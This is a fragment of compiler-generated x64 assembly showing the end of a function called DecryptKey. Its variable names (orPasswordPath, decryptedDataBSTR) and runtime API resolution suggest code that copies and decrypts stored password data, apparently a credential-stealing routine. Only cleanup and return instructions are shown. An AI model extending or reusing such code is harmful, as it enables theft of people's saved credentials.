	lea	rcx, QWORD PTR orPasswordPath$[rsp]
	call	?CreateCopyFile@@YA_NPEAD0@Z		; CreateCopyFile
	movzx	eax, al
; Line 728
	mov	rax, QWORD PTR pSysFreeString$[rsp]
	mov	QWORD PTR tv1138[rsp], rax
	mov	rcx, QWORD PTR decryptedDataBSTR$[rsp]
	call	QWORD PTR tv1138[rsp]
; Line 729
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv1142[rsp], rax
	mov	rcx, QWORD PTR hFile$2[rsp]
	call	QWORD PTR tv1142[rsp]
	npad	1
$LN33@DecryptKey:
; Line 732
	mov	rcx, QWORD PTR fileBuf$[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 733
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
$LN1@DecryptKey:
	add	rsp, 3840				; 00000f00H
	pop	rdi
	ret	0
?DecryptKey@@YAXXZ ENDP					; DecryptKey
_TEXT	ENDS
END
